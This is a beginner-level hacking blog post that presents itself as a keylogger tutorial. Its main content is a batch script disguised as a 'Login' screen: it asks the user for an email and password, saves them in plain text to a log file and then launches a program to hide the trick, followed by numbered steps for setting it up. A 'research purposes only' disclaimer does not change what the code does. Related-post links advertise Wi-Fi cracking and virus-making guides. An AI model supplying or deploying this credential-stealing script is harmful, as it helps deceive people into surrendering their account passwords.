Thursday, 10 April 2014

How to create a key-logger

How to create a key-logger
Hello Everyone Today I'm going to tell you about a Tip or Key-logger How to create Key-logger In notepad,there is simple Way I made this codes for notepad

Here is a basic key logger script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only.
@echo off
color a
title Login
cls
echo Please Enter Email Adress And Password
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >Log.txt
start >>Program Here<<
exit
1.) Now paste the above code into Notepad and save it as a Logger.bat file.
2.) Make a new folder on the desktop and name it Logs (If the folder is not called Logs, then it will not work.
3.) Drag that folder in to the C:\
4.) Test out the Logger.bat!
5.) Alright, now once you test it, you will go back into the Logs folder in the C:\And a .txt file will be in there, [if you make a second entry, the .txt file will overwrite itself.]

That's All you need to do .....

Related Posts:

  • 5 Steps Wifi Hacking – Cracking WPA2 Password 5 Steps Wifi Hacking – Cracking WPA2 Password: Today we will teach you 5 Steps of Wifi Hacking – Cracking WPA2 Password:  Wikipedia says :- Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are t… Read More
  • SEO Tips to Improve Your Blog SEO Tips to Improve Your Blog today also I have choose same topic, same topic but it has some new tricks for Optimizing your Blog as per Penguin Updates. Because I have personally checked it with my different Blo… Read More
  • Learn To Make Dangerous Virus In A Minute Learn To Make Dangerous Virus In A Minute ( Just For education Purposes ) In my previous post i had teach you guys to create virus that disable mouse andVirus to format Hard Disk. In this post i will teac… Read More
  • Best SEO Extensions for Google Chrome Best SEO Extensions for Google Chrome Hello Eveyone !!!! So today I am going to share such very useful techniques we call it On-Page and Off-Page SEO all we are doing because of better optim… Read More
  • How To Change Backtrack Hostname Root@Bt# How To Change Backtrack Hostname Root@Bt# ( Just For education Purposes ) Type :Tips and Trick Level : Easy Actually this post popped in my mind when one of my readers ask about changing the name in one of … Read More

0 comments:

Post a Comment